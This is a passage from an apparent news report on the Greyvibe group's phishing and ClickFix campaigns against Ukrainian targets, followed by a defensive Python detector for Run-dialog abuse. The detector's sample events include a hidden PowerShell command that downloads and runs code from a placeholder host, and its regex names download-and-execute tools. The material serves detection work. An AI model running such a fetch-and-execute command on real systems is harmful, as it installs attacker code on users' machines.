“While the activities align with Russian state interests, a number of observed indicators suggest the group has ties to the broader cybercrime ecosystem, with the group likely involving current or former cybercriminal actors,” the WithSecure researchers said in their report.
Shifting attack vectors
Greyvibe’s first campaign was launched in August 2025, with a series of spear phishing emails that purported to come from Ukrainian officials and government agencies including the Kyiv City, the Main Directorate of the State Emergency, and the State Service of Special Communications and Information Protection.
The emails included links to ZIP and RAR archives, hosted on Google Drive and a service called 4sync, that contained malware loaders written in Python and JavaScript. The final payload was a custom malware program developed by the group that the WithSecure researchers dubbed PhantomRelay.
In another attack in October, the group experimented with ClickFix-style attacks on fake Cloudflare CAPTCHA pages. These attacks instructed users to open the Windows Run dialog and paste in malicious commands.
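As an added example, not code from the article or from WithSecure's report: a small Python heuristic a defender could run over process-creation telemetry to surface the Run-dialog pattern described above. A command pasted into the Run dialog is spawned by explorer.exe, so a script interpreter started that way with a hidden-window or download flag on its command line stands out. The field names (Image, ParentImage, CommandLine) follow Sysmon event ID 1 naming, and the sample events and lure URL are constructed.

```python
"""Flag process-creation events consistent with ClickFix-style abuse of the Windows Run dialog."""
import json
import re

# Script interpreters a lure would ask the user to launch from the Run dialog.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# Command-line features worth flagging when the parent is explorer.exe (assumed heuristic).
SUSPICIOUS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|invoke-webrequest|\biwr\b|"
    r"\biex\b|downloadstring|https?://|\bcurl\b|\bbitsadmin\b)", re.IGNORECASE)


def score_event(event: dict) -> list:
    """Return the reasons an event looks like Run-dialog abuse; an empty list means no hit."""
    reasons = []
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    if parent != "explorer.exe" or image not in INTERPRETERS:
        return reasons
    reasons.append(f"{image} spawned directly by explorer.exe (Run dialog or shell launch)")
    for match in SUSPICIOUS.finditer(event.get("CommandLine", "")):
        reasons.append(f"command line contains '{match.group(0)}'")
    return reasons


def scan(lines):
    """Parse newline-delimited JSON events and yield (event, reasons) for each hit."""
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        reasons = score_event(event)
        if reasons:
            yield event, reasons


# Constructed sample events in Sysmon event ID 1 style; not real telemetry.
SAMPLE = r"""
{"EventID":1,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"powershell -w hidden -c \"iwr http://captcha-lure.invalid/v | iex\""}
{"EventID":1,"Image":"C:\\Windows\\System32\\notepad.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"notepad.exe notes.txt"}
{"EventID":1,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell -c Get-Date"}
"""

if __name__ == "__main__":
    for event, reasons in scan(SAMPLE.splitlines()):
        print("HIT:", event["CommandLine"])
        for reason in reasons:
            print("  -", reason)
```

Only the first sample event is flagged: the second is a benign explorer.exe child and the third has no explorer.exe parent.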


